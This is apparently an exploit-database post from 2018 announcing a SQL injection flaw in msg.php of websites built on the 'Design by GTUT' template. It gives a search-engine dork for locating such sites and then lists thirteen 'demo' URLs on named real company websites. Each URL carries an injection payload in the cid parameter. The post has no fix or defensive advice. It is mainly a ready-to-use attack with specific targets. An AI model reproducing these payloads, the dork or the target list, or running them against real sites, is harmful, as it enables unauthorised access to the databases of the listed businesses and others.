facebook facebook twitter rss

Design by GTUT SQL Injection

Author: Rednofozi , Published: 15-10-2018
|--------------------------------------------------------------|
|[+] Exploit Title: Design by GTUT SQL Injection
|[+] Date:13/10/2018
|[+] Exploit Author :Rednofozi
|[+] Tested on: : Windows 10 , parrot os
|[+] Vendor Homepage: http://www.gtut.com.tw
|[+] dork: intext:"Design by GTUT" msg.php
|[+] MY page https://cxsecurity.com/author/Inj3ct0r
|[+] MY page http://www.exploit4arab.org/author/308/Rednofozi
|[+] ME:Rednfozi@yahoo.com
|[+] ME:Rednofozi@hotmail.com
|[+] ME:inj3ct0r@tuta.io
|[+] fb.me :https://www.facebook.com/saeid.hat.3
|--------------------------------------------------------------|
|[+] RHG hackers iran team
|[+] Credits : Rednofozi
|[+] Vulnerability Type : admin page
|[+] Severity Level : High

***************************************************************|
demos :
# http://www.flweb.com.tw/exec/msg.php?mid=1&cid=3 and(version() regexp CHAR/**/(94, 53))&mod=show&pid=13&lg=T
# http://www.kmfsports.com/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.dacosemi.com.tw/exec/msg.php?mid=4&cid=4%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.ckoptics.com/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg&lg=E
# http://www.rato.tw/exec/msg.php?mid=6&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&pid=6&lg=E
# http://www.stingray.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.nuzon.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.cyelectronic.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.tongson.com.tw/exec/msg.php?mid=3&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.lampweb.com.tw/exec/msg.php?mid=3&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.songjin.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=T
# http://www.chiemei.com/exec/msg.php?lg=E&mid=14&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))
# http://www.ygget.com/exec/msg.php?off=1&mid=36&cid=18%20and(version()%20regexp%20CHAR/**/(94,%2053))&pid=18&lg=S
|--------------------------------------------------------------|
my name is Inj3ct0r Red Hat's hackers
**********************************************************************

Discovered by : Rednofozi RGH team hackers

Thanks To: ReZa CLONER , Moeein Seven. Rednofozi

Like us on Facebook :